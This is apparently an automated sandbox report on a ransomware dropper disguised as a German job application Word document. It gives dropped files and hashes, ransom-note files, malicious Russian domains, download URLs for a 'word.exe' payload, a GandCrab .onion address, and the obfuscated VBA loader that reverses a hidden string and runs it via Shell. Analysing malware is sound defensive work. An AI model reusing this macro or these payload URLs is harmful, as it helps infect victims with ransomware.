Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\Desktop\PWCCAWLGRE.jpg Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1566
Entropy (8bit):	7.859531067169886
Encrypted:	false
MD5:	70AF63AA14CFA5674B1B4A14EAB4DD57
SHA1:	C80E9CBF4735C7AC4822AF8675130126B172AEE0
SHA-256:	898364944E8DF3129B670334D77094A50F08835CB7E3008250FA2D902813A108
SHA-512:	658D20DE33A8B87953A74E13794199A7FBE495F252B0E2C9B3064B1DA355B245467FCBFEF21E8F9353D01DBC94EFCD247912ABDAE7E79D9B1116235CB90FCA68
Malicious:	false

C:\Users\user\Desktop\PWCCAWLGRE.pdf Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1566
Entropy (8bit):	7.871841746242617
Encrypted:	false
MD5:	F0DBC8B6B31B2A5FA04EC07E0A0DC350
SHA1:	52F55760965195F35DE9A271905F3C7F8D69CC75
SHA-256:	443703495EA4029B1884EC201E049DF1049078C3513254B41F36960EE7FA6F61
SHA-512:	B10967731A0AA1A0DB68B8A8FEB700BC5FEE3947F8885263750A60457573484599A8C3B44D016387F9BFFA79302631E0B6654FDB5A225E66C8A5E2755110D7F9
Malicious:	false

C:\Users\user\Desktop\QCFWYSKMHA.mp3 Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1566
Entropy (8bit):	7.867899312735574
Encrypted:	false
MD5:	BE3D12EAE943215107B13AA894880903
SHA1:	FCFF5941A839CD549B804215E83702B3FCFD1376
SHA-256:	DDE65362B9B0B4222212FF504CEA90DB2BAEAE25E4B1F57E74C78AC41A4D58AE
SHA-512:	908966C70DFD5D10BE31443A1B71A4B5243944FED4925D2745F85CD1B1139BA988FE159BCE7A086751E7AA0531522731A57B7DD40C8F6E677067B6149426D39A
Malicious:	false

C:\Users\user\Desktop\QCOILOQIKC\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\Desktop\SFPUSAFIOL\EOWRVPQCCS.mp3 Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1566
Entropy (8bit):	7.874587804234604
Encrypted:	false
MD5:	A7A3C05ACC0AA07FE0B358ED00FF6CCF
SHA1:	C4C30BBAF104FF3AA7060AFAC37B3CFAACDA9689
SHA-256:	1BE34D24B3AF0C60643E9E5D9B40D1694B596BA8020651C69294267EF2BA21B1
SHA-512:	FCF4B4B9D74851BB59A047A44462403DDF3B7FB25AFB038BF78DDC82D5A09BA57FF19E752291770D81599669049835B7F4E31B4C8A7D5734374A629D14848713
Malicious:	false

C:\Users\user\Desktop\SFPUSAFIOL\GRXZDKKVDB.png Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1566
Entropy (8bit):	7.874787242322605
Encrypted:	false
MD5:	A4FB69AB0C2A0548457C856E4A059921
SHA1:	B45D2D32302F9C67BCECF9156D85EE5DF78C91B1
SHA-256:	1BDB2464BB80596E86C4EA3FAB4723703989BD706706EC907880786C613C17BA
SHA-512:	663FC13B86207B8F8D96B450ADD91887B21AA5C0FA61252EECED9B6239E5BCA0CE91D563176C5D55FDA994235D6F94472438D97F9F4EF4FA4B51661DC32E178E
Malicious:	false

C:\Users\user\Desktop\SFPUSAFIOL\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\Desktop\Sarah_Siedler_Bewerbungsunterlagen.doc Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	57294
Entropy (8bit):	7.996647703864423
Encrypted:	true
MD5:	D7422AFAA825A3ECE306B9CA919264FA
SHA1:	F012F75140CF9FD04ADED9359CFBC6907518E644
SHA-256:	3205E68AC772AB284002EA62A33AD409491CAB35F870D8C4188B51A2BE0E174B
SHA-512:	6BA723346C17A6C7E9AD50E46D85B3A6AAA5ED2D1F6AF58059793682B8B7D55AFF86DED6E2562514364659B2670AD4C39BC607D98E537EFA6F00237759BBBAAF
Malicious:	true

C:\Users\user\Desktop\~$rah_Siedler_Bewerbungsunterlagen.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	162
Entropy (8bit):	2.2376333233215546
Encrypted:	false
MD5:	B909FF5718C910A44E746160E798EAF0
SHA1:	C2DA9F836655F892744BCB2C7BC8BB3D33E5213F
SHA-256:	CF08349527D38165446DD3914C97D76667FCBD24B25CBA1A7D6E47438594B2F2
SHA-512:	60810AD270167A531768E2E2BCE63C063A8D29A7B2BAB0C108FDC8DEACA99D9D00D89622471C92CE1A7DDA1824625F9227A9F17964F3A8067FA71FD4AE2F4C1A
Malicious:	false

C:\Users\user\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Windows\Temp\229.exe Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):	548352
Entropy (8bit):	6.994075430011946
Encrypted:	false
MD5:	A76B7140CF6D5C4DC5E0ECFF23FC2CE0
SHA1:	B312FEF877F8EAE6CA473A969F30BC85D907F7E3
SHA-256:	3A23FE7B3F8FA4D22A18AAFC9C3C52746A7142CD33F8DDAAA264CF475939B972
SHA-512:	6A74B01537ACF60408072D60F6A7B87C3F0D04A96301A3C1A051552F2248377C457A2A83505A6761017A2680FFCE0C33CD8B4FA99E75212E13CDEBD0A2F322E1
Malicious:	true

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
sndtgo.ru	78.155.218.207	true	true	2%, virustotal, Browse	unknown
www.kakaocorp.link	107.173.49.208	true	false		high
jewemsk.ru	92.53.96.93	true	true	0%, virustotal, Browse	unknown
starstyl.ru	92.53.98.31	true	true	3%, virustotal, Browse	low
a767.dscg3.akamai.net	88.221.144.97	true	false		high
prostor-rybalka.ru	90.156.201.98	true	true	4%, virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://sndtgo.ru/word.exe	true	Avira URL Cloud: malware	unknown
http://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe	powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp, powershell.exe, 00000004.00000002.1673176192.02266000.00000004.sdmp	false	Avira URL Cloud: malware	unknown
https://masterhost.ru/service/ecp/	powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmp	false		high
https://starstyl.ru/assets/plugiH	powershell.exe, 00000004.00000002.1673176192.02266000.00000004.sdmp	false	Avira URL Cloud: safe	low
https://masterhost.ru/service/hardware/rent/#smart-server	powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	false		high
https://starstyl.ruDj	powershell.exe, 00000004.00000002.1673288269.0234A000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
https://www.torproject.org/	229.exe, 00000005.00000002.1855736795.00413000.00000004.sdmp	false		high
https://hg.mv	229.exe, 00000005.00000003.1810878134.06F90000.00000004.sdmp	false		high
http://www.freebxml.org/).	229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp	false		high
http://xmlns.oracle.com/webservices/jaxws-databinding	229.exe, 00000005.00000003.1780112586.06F90000.00000004.sdmp	false		high
https://masterhost.ru/service/hosting/#professional	powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	false		high
https://30boxes.com/external/widget?refer=ff&url=%s	229.exe, 00000005.00000003.1816499856.06F90000.00000004.sdmp	false		high
https://masterhost.ru/service/domain/	powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	false		high
http://xml.apache.org/xalan-j	229.exe, 00000005.00000003.1779457192.06F90000.00000004.sdmp	false		high
https://masterhost.ru/service/mail/#mail_with_hosting	powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmp	false		high
https://www.kakaocorp.link/static/imgs/hehe.png	229.exe, 00000005.00000002.1860084954.06C31000.00000004.sdmp	false	Avira URL Cloud: safe	low
http://home.netscape.com/NC-rdf#	229.exe, 00000005.00000003.1816499856.06F90000.00000004.sdmp	false		high
https://masterhost.ru/service/domain/#lease	powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	false		high
https://www.google.de/search?q=.net	229.exe, 00000005.00000003.1817480993.06FA7000.00000004.sdmp	false		high
http://prostor-rybalka.ruh%	powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	false	Avira URL Cloud: safe	low
https://masterhost.ru/service/mail/	powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp, powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmp	false		high
https://www.kakaocorp.link/static/imgs/hehe.png6	229.exe, 00000005.00000002.1860084954.06C31000.00000004.sdmp	false	Avira URL Cloud: safe	low
http://cps.root-x1.letsencrypt.org0	229.exe, 00000005.00000002.1860209799.06CA8000.00000004.sdmp	false		high
http://wildsau.idv.uni-linz.ac.at/mfx/upx.html	229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp	false		high
https://masterhost.ru/service/ssl/	powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmp	false		high
https://masterhost.ru/service/hosting/vps/#hyperConstructor	powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	false		high
http://www.oracle.com/hotspot/jdk/	229.exe, 00000005.00000003.1775142968.06F90000.00000004.sdmp	false		high
https://jewemsk.ru	powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://casper.beckman.uiuc.edu/~c-tsai4	229.exe, 00000005.00000003.1786803514.06F90000.00000004.sdmp	false		high
https://masterhost.ru/service/hosting/	powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	false		high
https://jewemsk.ruh%	powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmp	false	Avira URL Cloud: safe	low
http://www.oracle.com/hotspot/jvm/socket-io-threshold	229.exe, 00000005.00000003.1775142968.06F90000.00000004.sdmp	false		high
http://gandcrabmfe6mnef.onion/fa404de73c4e0000	229.exe, 00000005.00000002.1859406137.069B0000.00000004.sdmp	false		high
http://www.xfree86.org/)	229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp	false		high
https://masterhost.ru/service/special_packs/	powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	false		high
http://www.symauth.com/cps0(	229.exe, 00000005.00000003.1808260698.06F9A000.00000004.sdmp	false		high
http://dl.javafx.com/javafx-cache.jnlp	229.exe, 00000005.00000003.1774155853.06F90000.00000004.sdmp	false		high
http://www.ecma-international.org/memento/codeofconduct.htm	229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp	false		high
http://www.oracle.com/hotspot/jvm/file-io-threshold	229.exe, 00000005.00000003.1775142968.06F90000.00000004.sdmp	false		high
https://masterhost.ru/service/hosting/vps/#vpsPlusMssql	powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	false		high
http://www.unicode.org/cldr/data/.	229.exe, 00000005.00000003.1786803514.06F90000.00000004.sdmp	false		high
https://masterhost.ru/service/ssl/#ov	powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmp	false		high
https://masterhost.ru/service/hosting/unix/edu/	powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	false		high
http://www.symauth.com/rpa0)	229.exe, 00000005.00000003.1808260698.06F9A000.00000004.sdmp	false		high
https://www.google.de/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjwzYrg7ILRAhUG0IMKHVAfDIwQ	229.exe, 00000005.00000003.1820538853.06F90000.00000004.sdmp	false		high
https://masterhost.ru/	powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmp	false		high
http://www.symauth.com/rpa00	229.exe, 00000005.00000003.1808230416.06F94000.00000004.sdmp	false		high
https://masterhost.ru/service/hosting/constructor/	powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	false		high
https://www.mibbit.com/?url=%s	229.exe, 00000005.00000003.1816499856.06F90000.00000004.sdmp	false		high
http://www.oracle.com/technetwork/java/javase/overview/	229.exe, 00000005.00000003.1787687899.06F90000.00000004.sdmp	false		high
https://starstyl.ru	powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	false	Avira URL Cloud: safe	low
http://prostor-rybalka.ruH	powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://www.oracle.com/hotspot/jvm/	229.exe, 00000005.00000003.1775142968.06F90000.00000004.sdmp	false		high
https://masterhost.ru/service/domain/price/	powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	false		high
https://masterhost.ru/events/actions/current/	powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	false		high
https://masterhost.ru/service/soft/ispmanager/	powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	false		high
https://compose.mail.yahoo.com/?To=%s	229.exe, 00000005.00000003.1816499856.06F90000.00000004.sdmp	false		high
http://www.oracle.com/hotspot/jvm/enable-errors	229.exe, 00000005.00000003.1775142968.06F90000.00000004.sdmp	false		high
http://www.ietf.org/rfc/rfc2373.txt)	229.exe, 00000005.00000003.1777533617.06F90000.00000004.sdmp	false		high
http://www.freebxml.org/	229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp	false		high
http://www.linuxnet.com	229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp	false		high
http://www.oracle.com/goto/opensourcecode/request	229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp	false		high
https://masterhost.ru/service/ssl/#dv	powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmp	false		high
https://masterhost.ru/service/hosting/vps/	powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	false		high
http://upx.sourceforge.net/upx-license.html.	229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp	false		high
http://jax-ws.java.net/features/databinding	229.exe, 00000005.00000003.1780112586.06F90000.00000004.sdmp	false		high
https://masterhost.ru/service/hosting/#unix	powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	false		high
http://hg.openjdk.java.net/jdk8u/jdk8u/jdk/file/tip/src/share/native/sun/security/ec/impl	229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp	false		high
http://gandcrabmfe6mnef.onion/	229.exe, 229.exe, 00000005.00000002.1855736795.00413000.00000004.sdmp	false		high
https://masterhost.ru/service/domain/rules/	powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	false		high
http://mozilla.org/MPL/2.0/.	229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp	false		high
https://real.com/	229.exe, 00000005.00000003.1807771526.06F90000.00000004.sdmp	false		high
http://sndtgo.ruH	powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/).	229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp	false		high
http://hg.openjdk.java.net/openjfx/8u/rt	229.exe, 00000005.00000003.1786803514.06F90000.00000004.sdmp	false		high
http://www.unicode.org/Public/	229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp, 229.exe, 00000005.00000003.1786803514.06F90000.00000004.sdmp	false		high
https://masterhost.ru/service/mail/#mail_transfer	powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmp	false		high
https://masterhost.ru/service/ssl/#ev	powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmp	false		high
https://masterhost.ru/service/hosting/#windows	powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	false		high
http://www.oracle.com/hotspot/jfr-info/	229.exe, 00000005.00000003.1775142968.06F90000.00000004.sdmp	false		high
https://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidH	powershell.exe, 00000004.00000002.1673176192.02266000.00000004.sdmp	false	Avira URL Cloud: safe	low
https://www.google.de/search?q=test&ie=utf-8&oe=utf-8&gws_rd=cr&ei=9yRZWNXLEMfYjwTOhpXYDg	229.exe, 00000005.00000003.1820920259.06F90000.00000004.sdmp	false		high
http://relaxngcc.sf.net/).	229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp	false		high
http://sndtgo.ru/word.exeH	powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://www.oracle.com/hotspot/jvm/enable-exceptions	229.exe, 00000005.00000003.1775142968.06F90000.00000004.sdmp	false		high
https://cp.masterhost.ru/	powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	false		high
http://www.nexus.hu/upx	229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp	false		high
http://dl.javafx.com/javafx-rt.jnlp	229.exe, 00000005.00000003.1774155853.06F90000.00000004.sdmp	false		high
http://tartarus.org/~martin/PorterStemmer	229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp	false		high
http://download.oracle.com/javase/7/docs/technotes/guides/plugin/	229.exe, 00000005.00000003.1787687899.06F90000.00000004.sdmp	false		high
https://www.google.de/search?q=chrome	229.exe, 00000005.00000003.1817480993.06FA7000.00000004.sdmp, 229.exe, 00000005.00000003.1820538853.06F90000.00000004.sdmp	false		high
http://sndtgo.ruh%	powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmp	false	Avira URL Cloud: safe	low
https://masterhost.ru/service/hardware/rent/	powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	false		high
https://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exeH	powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	false	Avira URL Cloud: safe	low
https://www.google.de/images/branding/product/ico/googleg_lodp.ico	229.exe, 00000005.00000003.1817847507.0706E000.00000004.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp	false		high
https://hg.m	229.exe, 00000005.00000003.1810529389.06F90000.00000004.sdmp	false		high
http://www.unicode.org/Public/.	229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp, 229.exe, 00000005.00000003.1786803514.06F90000.00000004.sdmp	false		high
http://www.apache.org/licenses/	229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Country	ASN	ASN Name	Malicious
90.156.201.98	Russian Federation	25532	unknown	true
92.53.96.93	Russian Federation	9123	unknown	true
92.53.98.31	Russian Federation	9123	unknown	true
78.155.218.207	Russian Federation	50340	unknown	true

Static File Info

General
File type:	Microsoft Word 2007+
Entropy (8bit):	7.451656648111262
TrID:	Word Microsoft Office Open XML Format document with Macro (52004/1) 52.79% Word Microsoft Office Open XML Format document (41004/1) 41.62% ZIP compressed archive (4004/1) 4.06% Java Script embedded in Visual Basic Script (1500/0) 1.52%
File name:	Sarah_Siedler_Bewerbungsunterlagen.doc
File size:	80143
MD5:	fe2d1caa2d52000efcd19ea1ea31d254
SHA1:	6496aa6a299bc606ee9d058bdf4f0d826a2e4541
SHA256:	dcf3c03887af46b3160d984a6268ac3fcc6e659895ba4721e952ecaf363cfbdb
SHA512:	592a3447aa75b48b578b9f6b08524482b16c701f152b2fc2c074e63a9be84f250b380913b172e44af1dffbb0e223b6f17b959ac342b417fcbccadb3272b51f2d
SSDEEP:	1536:41jeafPXGdythQh/zkq9D4aqFrvlUmz8qtBy0ZrPNp:Wvfc37kq9zqYVqtBRZTNp
File Content Preview:	PK..........!.x..}....e.......[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static OLE Info

General
Document Type:	OpenXML
Number of OLE Files:	1

OLE File "word/vbaProject.bin"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Streams with VBA

VBA File Name: IvHpl.bas, Stream Size: 1418

General
Stream Path:	VBA/IvHpl
VBA File Name:	IvHpl.bas
Stream Size:	1418
Data ASCII:	. . . . . . . . . L . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . w . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 4c 03 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 53 03 00 00 9b 04 00 00 00 00 00 00 01 00 00 00 77 13 f9 62 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
EzDka)
VB_Name
"IvHpl"
Function
String
Single
pcbBtz
pcbBtz(sYNoxQh,
Shell(StrReverse(sYNoxQh),
False
Attribute
xDQze()
Boolean

VBA Code

Attribute VB_Name = "IvHpl"
Sub xDQze()
End Sub
Sub V7LCHEVbx()
End Sub
Function pcbBtz(sYNoxQh, EzDka) As String
Dim UPQ2DvJWM As Boolean
UPQ2DvJWM = False
Dim WLqv4a6J As Single
WLqv4a6J = 23197.750737484
pcbBtz = Shell(StrReverse(sYNoxQh), 0)
End Function

VBA File Name: NexFaBP.bas, Stream Size: 1565

General
Stream Path:	VBA/NexFaBP
VBA File Name:	NexFaBP.bas
Stream Size:	1565
Data ASCII:	. . . . . . . . . , . . . . . . . . . . . . . . . 3 . . . . . . . . . . . . . . . w . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 2c 03 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 33 03 00 00 f3 04 00 00 00 00 00 00 01 00 00 00 77 13 a8 9f 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
VB_Name
Public
"NexFaBP"
Single
False
Attribute
Boolean
cDoNYM

VBA Code

Attribute VB_Name = "NexFaBP"
Sub zgedb5uE()
Dim Md53kf8 As Single
Md53kf8 = Fix(63298.888186878)
End Sub
Public Sub i9900k()
Dim piy0w As Long
piy0w = 0
Dim s4dUncq2 As Boolean
s4dUncq2 = False
Dim AWpR8M As Boolean
AWpR8M = True
Dim cDoNYM As Long
cDoNYM = Sgn(-1578441454)
Dim DAHsW4wge As Long
DAHsW4wge = -335364396
zGZ20tm8$
End Sub

VBA File Name: RCUzh.bas, Stream Size: 1923

General
Stream Path:	VBA/RCUzh
VBA File Name:	RCUzh.bas
Stream Size:	1923
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w . . O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 84 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 8c 03 00 00 e0 05 00 00 00 00 00 00 01 00 00 00 77 13 d3 4f 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
VB_Name
Public
Function
String
Object
Single
Len(jhaGfR)
DxTqzWD
Double
"RCUzh"
Attribute

VBA Code

Attribute VB_Name = "RCUzh"
Sub PtNBJO8Yp()
End Sub
Public Function zGZ20tm8() As String
Dim PvWP6
PvWP6 = "&"
Dim Mb0KC As Single
Mb0KC = Sgn(51873.055630678)
Dim nuZzfEa8j As Object
Set nuZzfEa8j = New fm
Dim Vih9Ldw As Byte
Vih9Ldw = 63
Dim RDbFnvZl7 As String
Dim PnHE18cfu As String
PnHE18cfu = Len(jhaGfR)
RDbFnvZl7 = nuZzfEa8j.monday.Text
Dim oqEHOy2 As Long
oqEHOy2 = -1101752412
Dim DxTqzWD As Double
DxTqzWD = Sgn(39646.160630077)
RDbFnvZl7 = pcbBtz(RDbFnvZl7, 28928 / 113)
zGZ20tm8 = RDbFnvZl7
End Function

VBA File Name: ThisDocument.cls, Stream Size: 1582

General
Stream Path:	VBA/ThisDocument
VBA File Name:	ThisDocument.cls
Stream Size:	1582
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . < . . . . . . Z . . . . . I . # . . . . . . X . ' . w . . I . . f Y A c ; . . . . . . . . . . . . . . . . . . . . . . . m . J . Y @ . . . V E . B T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . m . J . Y @ . . . V E . B T . Z . . . . . I . # . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 06 00 01 00 00 9e 03 00 00 e4 00 00 00 ea 01 00 00 cc 03 00 00 da 03 00 00 12 05 00 00 01 00 00 00 01 00 00 00 77 13 e6 1d 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 3c 00 ff ff 00 00 d1 5a ae 91 b5 bd a9 49 9d 23 f5 b4 bc 8e 13 ab 58 a9 27 a1 77 eb e1 49 9b 88 66 59 41 63 3b 1c 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
RgeJIsB
VB_Name
VB_Creatable
VB_Exposed
Boolean
VB_Customizable
Document_Open()
VB_TemplateDerived
"ThisDocument"
False
Attribute
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base

VBA Code

